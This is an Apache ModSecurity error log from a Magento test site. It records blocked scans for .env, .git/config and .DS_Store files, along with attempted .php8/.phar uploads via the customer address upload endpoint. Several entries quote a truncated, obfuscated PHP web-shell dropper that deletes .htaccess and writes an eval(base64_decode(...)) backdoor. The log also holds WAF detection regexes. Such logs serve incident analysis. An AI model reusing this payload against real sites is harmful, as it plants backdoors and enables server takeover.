[Sat Dec 20 01:33:14.405938 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: cn88364f428d25.php8 found within FILES:custom_attributes[country_id]: cn88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUXuyuu6PN3P_14DnkuHrAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/n/cn88364f428d25.phar
[Sat Dec 20 01:33:14.406598 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUXuyuu6PN3P_14DnkuHrAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/n/cn88364f428d25.phar
[Sat Dec 20 01:33:14.406770 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUXuyuu6PN3P_14DnkuHrAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/n/cn88364f428d25.phar
[Sat Dec 20 01:33:15.649819 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Rule 7fe18767fbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.php8"] [unique_id "aUXuy-u6PN3P_14DnkuHrQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 01:33:15.650303 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.php8"] [unique_id "aUXuy-u6PN3P_14DnkuHrQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 01:33:15.652629 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.php8"] [unique_id "aUXuy-u6PN3P_14DnkuHrQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 01:33:15.652816 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.php8"] [unique_id "aUXuy-u6PN3P_14DnkuHrQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 08:00:02.782486 2025] [authz_core:error] [pid 856675] [client 207.154.212.47:49562] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 20 08:00:05.791383 2025] [:error] [pid 857293] [client 207.154.212.47:49598] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZJdYwzYS-2Oqd5dh3-xAAAABA"]
[Sat Dec 20 08:00:05.791627 2025] [:error] [pid 857293] [client 207.154.212.47:49598] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZJdYwzYS-2Oqd5dh3-xAAAABA"]
[Sat Dec 20 08:00:05.791780 2025] [:error] [pid 857293] [client 207.154.212.47:49598] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZJdYwzYS-2Oqd5dh3-xAAAABA"]
[Sat Dec 20 08:00:06.775389 2025] [:error] [pid 857287] [client 207.154.212.47:49600] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZJdj8tfwrk48OAesWKUwAAAAo"]
[Sat Dec 20 08:00:06.777545 2025] [:error] [pid 857287] [client 207.154.212.47:49600] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZJdj8tfwrk48OAesWKUwAAAAo"]
[Sat Dec 20 08:00:06.777735 2025] [:error] [pid 857287] [client 207.154.212.47:49600] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZJdj8tfwrk48OAesWKUwAAAAo"]
[Sat Dec 20 08:00:08.777115 2025] [:error] [pid 857289] [client 207.154.212.47:49602] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZJeEcesDQvflsX-zh5SgAAAAw"]
[Sat Dec 20 08:00:08.777340 2025] [:error] [pid 857289] [client 207.154.212.47:49602] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZJeEcesDQvflsX-zh5SgAAAAw"]
[Sat Dec 20 08:00:08.777489 2025] [:error] [pid 857289] [client 207.154.212.47:49602] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZJeEcesDQvflsX-zh5SgAAAAw"]
[Sat Dec 20 10:47:27.568169 2025] [authz_core:error] [pid 856676] [client 142.93.129.190:60566] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 20 10:47:30.584587 2025] [:error] [pid 857290] [client 142.93.129.190:60594] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZwsibsPSl6AuAMnb6ogQAAAA0"]
[Sat Dec 20 10:47:30.584814 2025] [:error] [pid 857290] [client 142.93.129.190:60594] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZwsibsPSl6AuAMnb6ogQAAAA0"]
[Sat Dec 20 10:47:30.584981 2025] [:error] [pid 857290] [client 142.93.129.190:60594] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZwsibsPSl6AuAMnb6ogQAAAA0"]
[Sat Dec 20 10:47:31.590052 2025] [:error] [pid 857287] [client 142.93.129.190:60610] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZwsz8tfwrk48OAesWKcQAAAAo"]
[Sat Dec 20 10:47:31.590271 2025] [:error] [pid 857287] [client 142.93.129.190:60610] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZwsz8tfwrk48OAesWKcQAAAAo"]
[Sat Dec 20 10:47:31.590462 2025] [:error] [pid 857287] [client 142.93.129.190:60610] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZwsz8tfwrk48OAesWKcQAAAAo"]
[Sat Dec 20 10:47:33.583085 2025] [:error] [pid 857289] [client 142.93.129.190:56810] [client 142.93.129.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZwtUcesDQvflsX-zh5bAAAAAw"]
[Sat Dec 20 10:47:33.583316 2025] [:error] [pid 857289] [client 142.93.129.190:56810] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZwtUcesDQvflsX-zh5bAAAAAw"]
[Sat Dec 20 10:47:33.583489 2025] [:error] [pid 857289] [client 142.93.129.190:56810] [client 142.93.129.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZwtUcesDQvflsX-zh5bAAAAAw"]
[Sat Dec 20 19:12:34.623606 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Rule 7f3754690be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aUbnEowzYS-2Oqd5dh3_IgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 19:12:34.624049 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aUbnEowzYS-2Oqd5dh3_IgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 19:12:34.626347 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aUbnEowzYS-2Oqd5dh3_IgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 19:12:34.626526 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.phar"] [unique_id "aUbnEowzYS-2Oqd5dh3_IgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 19:12:34.786413 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: yf88364f428d25.php8 found within FILES:custom_attributes[country_id]: yf88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUbnEowzYS-2Oqd5dh3_IwAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/f/yf88364f428d25.phar
[Sat Dec 20 19:12:34.787079 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUbnEowzYS-2Oqd5dh3_IwAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/f/yf88364f428d25.phar
[Sat Dec 20 19:12:34.787257 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUbnEowzYS-2Oqd5dh3_IwAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/f/yf88364f428d25.phar
[Sat Dec 20 19:12:36.479940 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Rule 7f3754690be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aUbnFIwzYS-2Oqd5dh3_JAAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 19:12:36.480388 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aUbnFIwzYS-2Oqd5dh3_JAAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 19:12:36.482935 2025] [:error] [pid 857293] [client 46.149.66.101:55688] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/f/yf88364f428d25.php8"] [unique_id "aUbnFIwzYS-2Oqd5dh3_JAAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
